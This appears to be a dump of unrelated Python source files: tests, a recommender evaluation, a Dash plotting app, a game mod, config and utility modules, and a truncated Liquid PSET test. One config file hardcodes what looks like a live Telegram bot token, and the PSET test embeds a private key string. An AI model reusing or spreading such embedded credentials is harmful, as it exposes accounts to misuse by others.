self.assertIn('code.gov', self.browser.title)
class TestHomeArea(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
self.addCleanup(self.browser.quit)
self.browser.get('https://code.gov')
def testOpenTasks(self):
button = self.browser.find_element_by_xpath('//button[text()="Explore Open Tasks"]')
button.click()
self.assertEqual(self.browser.current_url, 'https://code.gov/#!/help-wanted')
# Used keyboard and execute_script because webdriver incorrectly
# considered search bar to be hidden
# https://github.com/mozilla/geckodriver/issues/1173
def testSearchBar(self):
self.browser.execute_script('''
document.querySelector("[title='Search Code.gov']").focus();
''')
sleep(5)
keyboard.write('python')
sleep(1)
keyboard.send('enter')
sleep(5)
self.assertEqual(self.browser.current_url, 'https://code.gov/#!/search?q=python')
if __name__ == '__main__':
unittest.main(verbosity=2)
|
from nanome._internal._ui._serialization import _MenuSerializer, _LayoutNodeSerializer, _UIBaseSerializer
from nanome._internal._util._serializers import _ArraySerializer
from nanome._internal._util._serializers import _TypeSerializer
class _ReceiveMenu(_TypeSerializer):
def __init__(self):
self.menu = _MenuSerializer()
self.array = _ArraySerializer()
self.layout = _LayoutNodeSerializer()
self.content = _UIBaseSerializer()
def version(self):
return 0
def name(self):
return "ReceiveMenu"
def serialize(self, version, value, context):
pass
def deserialize(self, version, context):
temp_menu = context.read_using_serializer(self.menu)
self.array.set_type(self.layout)
temp_nodes = context.read_using_serializer(self.array)
self.array.set_type(self.content)
temp_contents = context.read_using_serializer(self.array)
#returns 3 params as a tuple.
return temp_menu, temp_nodes, temp_contents |
#!/usr/bin/env python
import itertools
import sys
import random
import zorder
PRNG = random.SystemRandom()
COUNT = 1000
coord_dimension = long(sys.argv[1])
coord_min_value = long(sys.argv[2])
coord_max_value = long(sys.argv[3])
assert coord_max_value >= coord_min_value
coord_range = coord_max_value - coord_min_value
coord_bitsize = coord_range.bit_length()
encoder = zorder.ZEncoder(ndim=coord_dimension, bits=(coord_bitsize * coord_dimension))
def cull(v):
return max(coord_min_value, min(coord_max_value, v))
def encode(coordinates):
coordinates = map(lambda v: cull(v) - coord_min_value, coordinates)
return encoder.encode(coordinates)
def repeat(fun, n):
return [fun() for _ in range(n)]
def run():
max_coord_count = (coord_range + 1) ** coord_dimension
count = min(COUNT, max_coord_count)
print >>sys.stderr, (
'generating %d %dd values for coordinates between [%d, %d]' %
(count, coord_dimension, coord_min_value, coord_max_value))
if count >= max_coord_count:
# generate sequentially
coord_value_possibilities = range(coord_min_value, coord_max_value + 1)
all_coordinates = itertools.product(
coord_value_possibilities, repeat = coord_dimension)
else:
# brute force
all_coordinates = set()
while len(all_coordinates) < COUNT:
coordinates = tuple(
repeat(
lambda: PRNG.randint(coord_min_value, coord_max_value),
coord_dimension))
all_coordinates.add(coordinates)
all_coordinates = sorted(list(all_coordinates))
#print
for coordinates in all_coordinates:
coordinates_str = '{%s}' % ','.join(map(str, coordinates))
print '{%s, %d}.' % (coordinates_str, encode(coordinates))
run()
|
from .raster_tools import ropen, read
from .vector_tools import vopen
from .classification.classification import classification, classification_r
from .classification.error_matrix import error_matrix, object_accuracy
from .classification.change import change
from .classification._moving_window import moving_window
from .classification._morph_cells import morph_cells
from .classification.reclassify import reclassify
from .classification.recode import recode
from .classification.sample_raster import sample_raster
from .raster_calc import raster_calc
from .veg_indices import veg_indices, VegIndicesEquations
from .vrt_builder import vrt_builder
from .testing.test import main as test
from .version import __version__
__all__ = ['ropen',
'read',
'vopen',
'classification', 'classification_r',
'error_matrix', 'object_accuracy',
'moving_window', 'morph_cells', 'change', 'reclassify', 'recode',
'raster_calc',
'veg_indices', 'VegIndicesEquations',
'vrt_builder',
'test',
'__version__']
|
import pandas
from sklearn import model_selection
from sklearn.linear_model import LogisticRegression
import pickle
import codecs
import json
import gensim
import numpy as np
import math
import random
import numpy
import operator
import scipy
import Queue
from heapq import nlargest
# Evaluation Metircs
def r_precision(G, R):
limit_R = R[:len(G)]
if len(G) != 0:
return len(list(set(G).intersection(set(limit_R)))) * 1.0 / len(G)
else:
return 0
def ndcg(G, R):
r = [1 if i in set(G).intersection(set(R)) else 0 for i in R]
r = np.asfarray(r)
dcg = r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))
#k = len(set(G).intersection(set(R)))
k = len(G)
if k > 0:
idcg = 1 + np.sum(np.ones(k - 1) / np.log2(np.arange(2, k + 1)))
return dcg * 1.0 / idcg
else:
return 0
def clicks(G, R):
r = [1 if i in set(G).intersection(set(R)) else 0 for i in R]
if sum(r) == 0:
return 51
else:
return (r.index(1) - 1) * 1.0 / 10
# Calculation Tools
def find_nearest_k(pid, k):
global PL_Word2Vec_TEST
global TEST
res = []
sim = {}
for track in model.wv.vocab.keys():
sim[track] = 1 - scipy.spatial.distance.cosine(np.array(PL_Word2Vec_TEST[pid]),np.array(model.wv[track]))
switch_sim = dict((k, v) for v, k in sim.items())
sorted_sim = sorted(switch_sim.keys(), reverse = True)
for i in range(k):
res.append(switch_sim[sorted_sim[i]])
return res
# Load Model (MUST USE LATEST ONE)
model = gensim.models.Word2Vec.load('song2vec_GT5_TRAIN')
# Calculate the average vector
track_sum_vec = np.zeros(100, dtype = float)
for track in model.wv.vocab:
track_sum_vec += model.wv[track]
track_average_vec = track_sum_vec / len(model.wv.vocab)
all_test_tracks = model.wv.vocab.keys()
# Recommendation
for task in range(10):
print "Starting TASK " + str(task)
print "Loading Data..."
TEST = json.load(open('../DATA_PROCESSING/PL_TRACKS_5_TEST_T' + str(task) + '.json'))
SUB_TEST_PL = TEST.keys()[:500]
SUB_TEST = {k:v for (k,v) in TEST.items() if k in SUB_TEST_PL}
# Load Ground Truth
TEST_GROUND_TRUTH_RAW = json.load(open('../DATA_PROCESSING/PL_TRACKS_5_TEST.json'))
TEST_GROUND_TRUTH = {}
for pl in SUB_TEST:
TEST_GROUND_TRUTH[pl] = TEST_GROUND_TRUTH_RAW[pl]
# Word2Vec for PL
PL_Word2Vec_TEST = {}
for pl in SUB_TEST:
current = np.zeros(100)
length = 0
for track in SUB_TEST[pl]:
if track in model.wv:
current += model.wv[track]
else:
current += track_average_vec
length += 1
if length != 0:
PL_Word2Vec_TEST[pl] = list(current / length)
else:
PL_Word2Vec_TEST[pl] = track_average_vec
print 'Loading Ground Truth...'
R = {}
G = {}
for pl in TEST_GROUND_TRUTH:
G[pl] = list(set(TEST_GROUND_TRUTH[pl]).difference(set(SUB_TEST[pl])))
print 'Finding Nearest K Neighbors...'
for pl in SUB_TEST:
R[pl] = find_nearest_k(pl, 500)
print 'Evaluating...'
print 'R_Precision:'
r_pre_result = []
for pl in SUB_TEST.keys():
r_pre_result.append(r_precision(G[pl], R[pl]))
r_pre_result = np.array(r_pre_result)
print '\tmean:', r_pre_result.mean(), 'std:', r_pre_result.std()
with open('Model_2_Performance_500.txt', 'a') as f:
f.write('TASK_' + str(task) +' R_Precision_Mean '+str(r_pre_result.mean())+' R_Precision_Std '+ str(r_pre_result.std()) + '\n')
print 'NDCG:'
ndcg_result = []
for pl in SUB_TEST.keys():
ndcg_result.append(ndcg(G[pl], R[pl]))
ndcg_result = np.array(ndcg_result)
print '\tmean:', ndcg_result.mean(), 'std:', ndcg_result.std()
with open('Model_2_Performance_500.txt', 'a') as f:
f.write('TASK_' + str(task) +' NDCG_Mean '+str(ndcg_result.mean())+' NDCG_Std '+ str(ndcg_result.std()) + '\n')
print 'Clicks:'
clicks_result = []
for pl in SUB_TEST.keys():
clicks_result.append(clicks(G[pl], R[pl]))
clicks_result = np.array(clicks_result)
print '\tmean:', clicks_result.mean(), 'std:', clicks_result.std()
with open('Model_2_Performance_500.txt', 'a') as f:
f.write('TASK_' + str(task) +' Clicks_Mean '+str(clicks_result.mean())+' Clicks_Std '+ str(clicks_result.std()) + '\n')
print '========================================\n'
|
from yubi.users.models.users import User
from yubi.users.models.profiles import Profile |
import test
circum = test.circumference(4)
#print("circumference: ", circum)
h = input("Enter name?")
s = input("Enter name 2?")
print(h ," and ",s, " are awesome!")
#circum = test.circumference(radius)
#print("circumference: ", circum)
bff = test.new_function(h, 1000)
print("bff = " + bff)
|
import os
# the token of your bot
TOKEN_BOT = '522701018:AAFVnFzfkYnJyBwzRR9gsKBRyvgmF60Pdpc'
TIME_INTERVAL = 30
URL_COINMARKET_SIMPLE_API = "https://api.coinmarketcap.com/v1/ticker/{}"
COINMARKET_API_URL_COINSLIST = 'https://api.coinmarketcap.com/v1/ticker/?limit=0'
COINMARKET_API_URL_GLOBAL = 'https://api.coinmarketcap.com/v1/global/'
FILE_JSON_COINMARKET = os.path.dirname(os.path.realpath(__file__)) + '/coinmarketcoins.json'
FILE_JSON_GLOBALINFOAPI = os.path.dirname(os.path.realpath(__file__)) + '/globalinfoapijson.json'
class JSONFiles:
def __init__(self):
self.coinmarketcapjson = []
self.globalinfoapijson = {}
def change_coinmarketcapjson(self, json1):
assert isinstance(json1, list)
self.coinmarketcapjson = json1
return json1
def change_globalinfoapijson_json(self, json2):
assert isinstance(json2, dict)
self.globalinfoapijson = json2
return json2
# the object of class JSONFiles for save json API coins lists
jsonfiles = JSONFiles()
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils.edge_aware import EdgeAwareRefinement
class StereoNetRefinement(nn.Module):
"""
The disparity refinement module proposed in StereoNet.
Args:
in_planes (int): the channels of input
batch_norm (bool): whether use batch normalization layer, default True
num (int): the number of edge aware refinement module
Inputs:
disps (list of Tensor): estimated disparity map, in [BatchSize, 1, Height//s, Width//s] layout
left (Tensor): left image feature, in [BatchSize, Channels, Height, Width] layout
right(Tensor): right image feature, in [BatchSize, Channels, Height, Width] layout
leftImage (Tensor): left image, in [BatchSize, 3, Height, Width] layout
rightImage (Tensor): right image, in [BatchSize, 3, Height, Width] layout
Outputs:
refine_disps (list of Tensor): refined disparity map, in [BatchSize, 1, Height, Width] layout
"""
def __init__(self, in_planes, batch_norm=True, num=1):
super(StereoNetRefinement, self).__init__()
self.in_planes = in_planes
self.batch_norm = batch_norm
self.num = num
# cascade the edge aware refinement module
self.refine_blocks = nn.ModuleList([
EdgeAwareRefinement(self.in_planes, self.batch_norm) for _ in range(self.num)
])
def forward(self, disps, left, right, leftImage, rightImage):
# only one estimated disparity map in StereoNet
init_disp = disps[-1]
# Upsample the coarse disparity map to the full resolution
h, w = leftImage.shape[-2:]
# the scale of downsample
scale = w / init_disp.shape[-1]
# upsample disparity map to image size, in [BatchSize, 1, Height, Width]
init_disp = F.interpolate(init_disp, size=(h, w), mode='bilinear', align_corners=False)
init_disp = init_disp * scale
# cascade and refine the previous disparity map
refine_disps = [init_disp]
for block in self.refine_blocks:
refine_disps.append(block(refine_disps[-1], leftImage))
# In this framework, we always keep the better disparity map be ahead the worse.
refine_disps.reverse()
return refine_disps
|
from __future__ import annotations
from typing import TYPE_CHECKING
import ba
from bastd.actor import bomb as stdbomb
from bd.me import bomb, MeBomb, blast
from bd.actor import AutoAim
if TYPE_CHECKING:
from typing import Sequence, Union
@bomb('elon_mine', is_mine=True, blast_coefficient=0.7, arm_time=0.5)
class ElonMine(MeBomb):
def init(self, actor: stdbomb.Bomb, position: Sequence[Union[int, float]],
velocity: Sequence[Union[int, float]], materials: Sequence[ba.Material]):
factory = stdbomb.BombFactory.get()
actor.node = ba.newnode('prop', delegate=actor, attrs={
'body': 'landMine',
'model': factory.land_mine_model,
'light_model': factory.land_mine_model,
'color_texture': ba.gettexture('achievementCrossHair'),
'position': position,
'velocity': velocity,
'shadow_size': 0.44,
'reflection': 'powerup',
'reflection_scale': [1],
'materials': materials})
def arm(self, actor: stdbomb.Bomb):
factory = stdbomb.BombFactory.get()
elon_mine_lit_tex = ba.gettexture('circleNoAlpha')
elon_mine_tex = ba.gettexture('achievementCrossHair')
actor.texture_sequence = ba.newnode(
'texture_sequence', owner=actor.node, attrs={
'rate': 30,
'input_textures': (elon_mine_lit_tex,
elon_mine_tex)})
ba.timer(0.5, actor.texture_sequence.delete)
ba.playsound(ba.getsound('activateBeep'),
position=actor.node.position)
actor.aim = AutoAim(actor.node, actor.owner)
# we now make it explodable.
ba.timer(0.25, ba.WeakCall(actor._add_material,
factory.land_mine_blast_material))
actor.texture_sequence.connectattr('output_texture', actor.node,
'color_texture')
|
import pytest
from sunpy.time.timerange import TimeRange
from sunpy.time import parse_time
from sunpy.net.vso.attrs import Time, Instrument
from sunpy.net.dataretriever.client import QueryResponse
import sunpy.net.dataretriever.sources.lyra as lyra
from sunpy.net.fido_factory import UnifiedResponse
from sunpy.net import Fido
from sunpy.net import attrs as a
from hypothesis import given, settings
from sunpy.net.tests.strategies import time_attr
LCClient = lyra.LYRAClient()
@pytest.mark.parametrize("timerange,url_start,url_end", [
(TimeRange('2012/1/7', '2012/1/7'),
'http://proba2.oma.be/lyra/data/bsd/2012/01/07/lyra_20120107-000000_lev2_std.fits',
'http://proba2.oma.be/lyra/data/bsd/2012/01/07/lyra_20120107-000000_lev2_std.fits'
),
(TimeRange('2012/12/1', '2012/12/2'),
'http://proba2.oma.be/lyra/data/bsd/2012/12/01/lyra_20121201-000000_lev2_std.fits',
'http://proba2.oma.be/lyra/data/bsd/2012/12/02/lyra_20121202-000000_lev2_std.fits'
),
(TimeRange('2012/4/7', '2012/4/14'),
'http://proba2.oma.be/lyra/data/bsd/2012/04/07/lyra_20120407-000000_lev2_std.fits',
'http://proba2.oma.be/lyra/data/bsd/2012/04/14/lyra_20120414-000000_lev2_std.fits'
)
])
def test_get_url_for_time_range(timerange, url_start, url_end):
urls = LCClient._get_url_for_timerange(timerange)
assert isinstance(urls, list)
assert urls[0] == url_start
assert urls[-1] == url_end
def test_get_url_for_date():
url = LCClient._get_url_for_date(parse_time((2013, 2, 13)))
assert url == 'http://proba2.oma.be/lyra/data/bsd/2013/02/13/lyra_20130213-000000_lev2_std.fits'
@given(time_attr())
def test_can_handle_query(time):
ans1 = lyra.LYRAClient._can_handle_query(
time, Instrument('lyra'))
assert ans1 is True
ans2 = lyra.LYRAClient._can_handle_query(time)
assert ans2 is False
@settings(deadline=50000)
@given(time_attr())
def test_query(time):
qr1 = LCClient.search(time, Instrument('lyra'))
assert isinstance(qr1, QueryResponse)
assert qr1.time_range().start == time.start
assert qr1.time_range().end == time.end
@pytest.mark.remote_data
@pytest.mark.parametrize("time,instrument", [
(Time('2013/8/27', '2013/8/27'), Instrument('lyra')),
(Time('2013/2/4', '2013/2/6'), Instrument('lyra')),
])
def test_get(time, instrument):
qr1 = LCClient.search(time, instrument)
res = LCClient.fetch(qr1)
download_list = res.wait(progress=False)
assert len(download_list) == len(qr1)
@pytest.mark.remote_data
@pytest.mark.parametrize(
"time, instrument",
[(a.Time('2012/10/4', '2012/10/6'), a.Instrument('lyra')),
(a.Time('2013/10/5', '2013/10/7'), a.Instrument('lyra'))])
def test_fido(time, instrument):
qr = Fido.search(time, instrument)
assert isinstance(qr, UnifiedResponse)
response = Fido.fetch(qr)
assert len(response) == qr._numfile
|
# encoding: utf-8
import unittest
import mrep.morph
class ParseTest(unittest.TestCase):
def test_parse(self):
parser = mrep.morph.MeCabParser()
ms = parser.parse('我輩は猫だ')
expect = [
{'surface': '我輩', 'pos': '代名詞'},
{'surface': 'は', 'pos': '助詞'},
{'surface': '猫', 'pos': '名詞'},
{'surface': 'だ', 'pos': '助動詞'},
]
self.assertEqual(len(expect), len(ms))
for e, m in zip(expect, ms):
self.assertEqual(e['surface'], m['surface'])
self.assertEqual(e['pos'], m['pos'])
def test_invalid_argument(self):
self.assertRaises(Exception,
lambda: mrep.morph.MeCabParser('--invalid-arg'))
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import sys
import gevent
from time import sleep
from testtools.matchers import Equals, Contains, Not
import test_case
from vnc_api.vnc_api import *
from device_api.juniper_common_xsd import *
#
# All Generaric utlity method shoud go here
#
class TestCommonDM(test_case.DMTestCase):
def set_obj_param(self, obj, param, value):
fun = getattr(obj, "set_" + param)
fun(value)
# end set_obj_param
def get_obj_param(self, obj, param):
fun = getattr(obj, "get_" + param)
return fun()
# end get_obj_param
def get_bgp_groups(self, config, bgp_type=''):
protocols = config.get_protocols()
bgp = protocols.get_bgp()
bgp_groups = bgp.get_group()
grps = []
for gp in bgp_groups or []:
if not bgp_type or bgp_type == gp.get_type():
grps.append(gp)
return grps
# end get_bgp_groups
def get_dynamic_tunnels(self, config):
ri_opts = config.get_routing_options()
if not ri_opts:
return None
return ri_opts.get_dynamic_tunnels()
# end get_dynamic_tunnels
def get_routing_instances(self, config, ri_name=''):
ri_list = config.get_routing_instances()
ri_list = ri_list.get_instance() or []
ris = []
for ri in ri_list or []:
if not ri_name or ri.get_name() == ri_name:
ris.append(ri)
return ris
def get_interfaces(self, config, name=''):
interfaces = config.get_interfaces()
if not interfaces:
return []
interfaces = interfaces.get_interface()
intfs = []
for intf in interfaces or []:
if not name or name == intf.get_name():
intfs.append(intf)
return intfs
# end get_interfaces
def get_ip_list(self, intf, ip_type='v4', unit_name=''):
units = intf.get_unit() or []
ips = []
for ut in units:
if unit_name and ut.get_name() != unit_name:
continue
f = ut.get_family() or Family()
inet = None
if ip_type == 'v4':
inet = f.get_inet()
else:
inet = f.get_inet6()
addrs = inet.get_address() or []
for a in addrs:
ips.append(a.get_name())
return ips
def set_hold_time(self, bgp_router, value):
params = self.get_obj_param(bgp_router, 'bgp_router_parameters') or BgpRouterParams()
self.set_obj_param(params, 'hold_time', 100)
self.set_obj_param(bgp_router, 'bgp_router_parameters', params)
# end set_hold_time
def set_auth_data(self, bgp_router, token, password, auth_type):
params = self.get_obj_param(bgp_router, 'bgp_router_parameters') or BgpRouterParams()
key = AuthenticationKeyItem(token, password)
self.set_obj_param(params, 'auth_data', AuthenticationData(auth_type, [key]))
self.set_obj_param(bgp_router, 'bgp_router_parameters', params)
# end set_auth_data
# end
|
import sys
import csv
import datetime
import calendar
import re
# number of views by day
# number of unique visitors by day
# articles
# number of visitors by article by day
# top 10 most visitors for an article across all days:
# "2018-11-01 article A: 40 visitors, 2018-11-05 article B: 36 visitors, ...")
# top 10 articles: total unique visitors
# (full list at bottom of output)
# top 10 articles: viewed by percent of seen visitors
# (full list at bottom of output)
# top 10 articles: total views, percent of total views
# (full list at bottom of output)
# top 10 articles: views per visitor per day
# (full list at bottom of output)
# search engines
# top 10 most-viewed articles: percent of views with each referrer domain
# (full list at bottom of output)
# top 10 most-viewed articles: percent of views with each seen search engine keyword
# (full list at bottom of output)
# top 10 most-viewed articles: percent of views with each seen platform-os
# (full list at bottom of output)
# top 10 most-viewed articles: percent of views with each seen platform-form-factor
# (full list at bottom of output)
def get_weekday_from_iso_date(iso_date):
date_y = int(iso_date[0:4])
date_m = int(iso_date[5:7])
date_d = int(iso_date[8:10])
return calendar.day_name[datetime.date(date_y, date_m, date_d).weekday()]
field_names = [
'date-time', 'visitor-day-id', 'http-verb', 'uri', 'proto', 'resp-code',
'resp-size', 'referrer-domain', 'search-engine', 'search-engine-keywords',
'platform-os', 'platform-form-factor'
]
# as of October 2021, consider any .html file an "article"
# (gallery pages do not have same URL pattern as articles, so
# we need to use a more general pattern here)
#article_uri_pattern = re.compile("^/20[0-9][0-9]/.+\.html$")
article_uri_pattern = re.compile("^.+\.html$")
csv_reader = csv.DictReader(sys.stdin, fieldnames=field_names, delimiter=' ')
view_visitors_by_day = dict()
views_by_day = dict()
view_visitors_by_article_by_day = dict()
all_visitors_by_day = dict()
for row in csv_reader:
date = row['date-time'][0:10]
# count only successful html page GET requests as a "page view"
if row['http-verb'] == 'GET' and row['resp-code'][0:1] in ['2','3'] and (row['uri'].endswith('/') or row['uri'].lower().endswith('.html')):
if not date in views_by_day:
views_by_day[date] = 0
views_by_day[date] += 1
if not date in view_visitors_by_day:
view_visitors_by_day[date] = dict()
view_visitors_by_day[date][row['visitor-day-id']] = None
# consider the home page "/" as an article
if row['uri'] == '/' or row['uri'].lower() == '/index.html' or article_uri_pattern.match(row['uri']):
if not date in view_visitors_by_article_by_day:
view_visitors_by_article_by_day[date] = dict()
if not row['uri'] in view_visitors_by_article_by_day[date]:
view_visitors_by_article_by_day[date][row['uri']] = dict()
view_visitors_by_article_by_day[date][row['uri']][row['visitor-day-id']] = None
if not date in all_visitors_by_day:
all_visitors_by_day[date] = dict()
all_visitors_by_day[date][row['visitor-day-id']] = None
#print("at %s (%s) saw %s" % (date, row['date-time'], row['visitor-day-id']))
print("Successful page views by day:")
for date in sorted(views_by_day):
day_name = get_weekday_from_iso_date(date)
print("%s %s - %d" % (day_name, date, views_by_day[date]))
print("")
print("Number of visitors with at least one successful page view by day:")
for date in sorted(view_visitors_by_day):
day_name = get_weekday_from_iso_date(date)
print("%s %s - %d" % (day_name, date, len(view_visitors_by_day[date])))
print("")
print("Number of visitors with at least one HTTP request by day:")
for date in sorted(all_visitors_by_day):
day_name = get_weekday_from_iso_date(date)
print("%s %s - %d" % (day_name, date, len(all_visitors_by_day[date])))
print("")
article_days = dict()
print("Unique visitors per article by day:")
for date in sorted(view_visitors_by_article_by_day):
day_name = get_weekday_from_iso_date(date)
d = dict()
for article in view_visitors_by_article_by_day[date]:
d[article] = len(view_visitors_by_article_by_day[date][article])
# thanks to https://stackoverflow.com/a/20948781
day_article_visitors = [(k, d[k]) for k in sorted(d, key=d.get, reverse=True)]
for article, visitors in day_article_visitors:
article_day = "%s %s - %s" % (day_name, date, article)
print("%s: %d" % (article_day, visitors))
article_days[article_day] = visitors
print("")
print("Top 10 articles by unique visitors by day:")
for article_day in sorted(article_days, key=article_days.get, reverse=True)[0:10]:
print("%s: %d" % (article_day, article_days[article_day]))
print("") |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r"^time", views.disp_time, name='time'),
url(r"^csv", views.disp_csv, name='csv'),
]
|
from ...Core.Input import Input
from typing import Tuple
import glfw
class WindowsInput(Input):
@staticmethod
def IsKeyPressed(keyCode: int) -> bool:
state = glfw.get_key(Input.GetNativeWindow(), WindowsInput.PI_KC_To_GLFW_KC(keyCode))
return (state == glfw.PRESS or state == glfw.REPEAT)
@staticmethod
def IsMouseButtonPressed(button: int) -> bool:
state = glfw.get_mouse_button(Input.GetNativeWindow(), WindowsInput.PI_MBC_To_GLFW_MBC(button))
return (state == glfw.PRESS)
@staticmethod
def GetMouseX() -> float:
return glfw.get_cursor_pos(Input.GetNativeWindow())[0]
@staticmethod
def GetMouseY() -> float:
return glfw.get_cursor_pos(Input.GetNativeWindow())[1]
@staticmethod
def GetMousePos() -> Tuple[float, float]:
return glfw.get_cursor_pos(Input.GetNativeWindow())
@staticmethod
def PI_KC_To_GLFW_KC(keyCode: int) -> int:
return keyCode
@staticmethod
def PI_MBC_To_GLFW_MBC(button: int) -> int:
return button
|
'''
使用multiprocessing模块创建多进程
'''
import os
from multiprocessing import Process
# 子进程要执行的代码
def run_proc(name):
print('Child process %s (%s) Running...' % (name, os.getpid()))
if __name__ == '__main__':
print('Parent process %s.' % os.getpid())
for i in range(5):
p = Process(target=run_proc, args=(str(i),))
print('Process will start.')
p.start()
p.join()
print('Process end.')
|
import pandas as pd
import math, os, sys
"""
Usage: ./cd_spectra.py <folder>
Plots a folder of CD spectra and melting curves and sets up a local
server to display them in an interactive browser window.
"""
def parse_ascii(filename):
start = 0
xunits = None
yunits = None
y2units = None
enzyme_conc = None
with open(filename, 'r') as f:
print('reading file ', filename)
for index, line in enumerate(f):
if line.startswith('XUNITS'):
xunits = line.split()[1]
elif line.startswith('YUNITS'):
yunits = line.split()[1]
elif line.startswith('Y2UNITS'):
y2units = line.split()[1]
elif line.startswith('XYDATA'):
start = index + 1
elif line.startswith('enzyme') or line.startswith('ENZYME'):
enzyme_conc = line.split()[1]
col_list = []
for col in [xunits, yunits, y2units]:
if col:
col_list.append(col)
data = pd.read_csv(filename,names=col_list,sep='\t',skiprows=start)
if enzyme_conc:
print('Normalizing to molar elipticity for ', str(filename))
#data[yunits] = 100 * (data[yunits]/float(1000)) / ((float(enzyme_conc) *
#float(10**-6)) * (2) )
coef = 0.001 / 1000 * 1000 / 10 # Coefficient that convert mDeg*L*/mol/cm to 10^3*Deg*cm^2/dmol
data['Molar Elipticity'] = coef * data[yunits] / (float(enzyme_conc) * 10**-6 ) / float(2)
else:
data['Molar Elipticity'] = data[yunits]
return pd.melt(data,id_vars=[yunits,y2units,'Molar Elipticity'])
def collect_spectra(folder):
filepaths = []
for file in os.listdir(folder):
if file.split('.')[-1] == 'txt':
filepaths.append(os.path.join(folder,file))
data = pd.DataFrame()
for f in filepaths:
if f.endswith('.txt'):
df = parse_ascii(f)
df['filename'] = f
data = pd.concat([data,df])
return data
def theta(T, Tm, dH, R):
# Assume molecularity of 1 for now
R = .001987203611
x = (dH / R) ((1 / T) - (1 / Tm))
psi = 1 / (1 + math.exp(x))
"""
For molecularity of 2, the equation would be
1 - (e**x)/4) (sqrt(1 + 8 e**-x) - 1)
"""
return psi
import dash, dash_table
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
from itertools import cycle
from flask_caching import Cache
from uuid import uuid4
import scipy.optimize as opt
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
CACHE_CONFIG= {
'CACHE_TYPE': 'simple',
}
cache= Cache()
cache.init_app(app.server, config=CACHE_CONFIG)
data = collect_spectra(sys.argv[1])
def update_spectra_graph(data):
df = data[data['variable']=='NANOMETERS']
traces = []
for name, group in df.groupby(['filename']):
points = go.Scatter(
x = group['value'],
y = group['Molar Elipticity'],
mode='lines',
name=name.split('/')[-1]
)
traces.append(points)
return traces
def update_melt_graph(data):
df = data[data['variable']=='Temperature']
traces =[]
for name, group in df.groupby(['filename']):
points = go.Scatter(
x = group['value'],
y = group['Molar Elipticity'],
mode = 'markers',
name=name.split('/')[-1]
)
#optimizedParameters, pcov = opt.curve_fit(theta,
#group['variable'], group['Molar Elipticity'])
traces.append(points)
return traces
def serve_layout():
session_id = str(uuid4())
return html.Div([
html.Div([
dcc.Graph(id='spectra',
figure={
'data':update_spectra_graph(data),
'layout':go.Layout(
xaxis={
'title':'Wavelength (nm)'
},
yaxis={'title':'Molar elipticity'},
margin={'l':40,'b':40,'t':100,'r':10},
hovermode='closest',
title='CD Spectra',
)
}
),
dcc.Graph(id='melt',
figure={
'data':update_melt_graph(data),
'layout':go.Layout(
xaxis={'title':'Temperature (C)'},
yaxis={'title':'Molar elipticity'},
margin={'l':40,'b':40,'t':100,'r':10},
hovermode='closest',
title='Melting curves',
)
}
),
])
])
app.layout = serve_layout
if __name__ == '__main__':
app.run_server(debug=True)
|
from unittest import TestCase
from embit.ec import PrivateKey
from embit.liquid.pset import PSET
from embit.hashes import tagged_hash
from embit.liquid import slip77
import threading
mbkey = PrivateKey.from_string("L2U2zGBgimb2vNee3bTw2y936PDJZXq3p7nMXEWuPP5MmpE1nCfv")
B64PSET = "cHNldP8BAgQCAAAAAQMEAAAAAAEEAQIBBQEEAfsEAgAAAAABAP33AQIAAAAAAq/zCgOyWrF7jEptFQVi+6pWu60rVxzzAh+SVuu0RkldAQAAAAD9////r/MKA7JasXuMSm0VBWL7qla7rStXHPMCH5JW67RGSV0AAAAAAP3///8ECi3+xw457nd+eWfnwyiqaPIwiyGcKy++gmgbjSOXHq4RCXPrFTqJtDeSkRDgpdh4kLEIrMDDTtAk6LZDVFn0zaSrA+HUWB/GqlWohVEnu/MA0QaiCM592NMPJRxHYXBVSg4zFgAU3eFT8XcfZM775nQRyHYE+En6B88LtKW1ryz0TLzDdw5jjgUA3XLQp/ypT0vaf8YBF3iwYbkI0Ca4UQNJymoyrg5l5bfq99NxlrStKKqUEJxqzin6O+ED5z4F75EztrIhsjDarL+I7I6lHCZoZsrVX37q95OjlMcWABRulkp1Y83Qz8HjnCZA/fWq+z6FyAsK8SBzt+X/tKGuLv9E2YnkiASzOqiZ2MorEerlLCdYLwjRc+edZLkOa/ablLA2b8aXvdt1a8Ai1QFqcPX2oZOM3wI+GEHY09vbIJVO1/rOeUJtVxKLHD1NBvybkYpLdkCtxRYAFG+gFlAKPGpzfrsmDi3cp4upI0VYARhpbPI+Mgmm6ER50B8T/nnJATVq5TkHzIgs/9PiZAEjAQAAAAAAAAF4AAB2AAAAAQF6CwrxIHO35f+0oa4u/0TZieSIBLM6qJnYyisR6uUsJ1gvCNFz551kuQ5r9puUsDZvxpe923VrwCLVAWpw9fahk4zfAj4YQdjT29sglU7X+s55Qm1XEoscPU0G/JuRikt2QK3FFgAUb6AWUAo8anN+uyYOLdyni6kjRVgiBgPu7SBaaQIv7UpioCRX82mbGcBr90v4AazG2a6EvBap4RhzxdoKVAAAgAEAAIAAAACAAAAAAAEAAAABDiA0NhauQv7rYlE2VO7IoPCJqhrYQwcTv/DUbZYEqNElXgEPBAIAAAABEAT9////B/wEcHNldA79ThBgMwAAAAAAAAABreTTAAFiJOXwKK3Qw8bnuSHdpODsjvsZLIiBjiR00RT6s8OXQPijmJuWlO43rzsEwdKr71yR6CTbSJm5mty13sqoh9I7B2WphX6kN53WsyU1vom1dnqd8nbBFcu4LQ6W/gN4f1C2iyguxehlKJq7+c73pHr7u51MSIxOinlUGa2PhD25nNq+HkA8NI6ZJKhVGki+Oj59TsbmzYYe89iijmG2n3k8Q7pZzFvcNBpj2o+ouUNjB6s6tYTFAkLbr9gEsck/mbPpOluEwVi2Y3UOLvwadfjA64RETLpFsvTuMBApH1yYxfahGiUWO6dmO1GykIhPYitrTPt16A5/47Qpf27iCMtDLLkrDpWg6KSC8PhaEhuJjzcGTeqdyxyONc2Ii0aTls7i2Um3rlIqBz/ONSvx2SzzZyLkpw+w/lnJjZq3273TUMYeKq4gNvVGnlIBkYRURJoYbCD+OL1xWZTKmfeNW4dkOkh5jDvoEv73B923YHYiIh